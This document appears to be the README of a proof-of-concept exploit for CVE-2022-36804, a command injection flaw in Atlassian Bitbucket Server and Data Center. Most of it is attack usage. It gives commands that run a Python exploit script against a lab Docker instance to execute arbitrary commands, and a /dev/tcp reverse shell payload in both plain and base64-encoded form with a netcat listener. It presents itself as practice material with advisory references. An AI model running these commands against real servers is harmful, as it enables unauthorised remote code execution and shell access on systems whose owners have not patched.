A critical command injection vulnerability was found in multiple API endpoints of the Atlassian Bit bucket Server and Data center. This vulnerability affects all versions of Bitbucket Server and Data Center released before versions <7.6.17
, <7.17.10
, <7.21.4
, <8.0.3
, <8.1.2
, <8.2.2
, and <8.3.1
docker build -t bitbucket .
docker run -it bitbucket
python3 cve-2022-36804.py -u http://172.17.0.2:7990
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo
Replace 172.17.0.3
with your local ip address
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"
nc -lvp 4444
Convert `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` to base64 in case of payload execution error.
python3 cve-2022-36804.py -u http://172.17.0.2:7990
-c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"
It is recommended to install vulnerable version of Bitbucket server in Windows/Linux machine for practice. It will be easy to achieve reverse shell compared to docker images.
More information can be found [here](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/)
# References
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804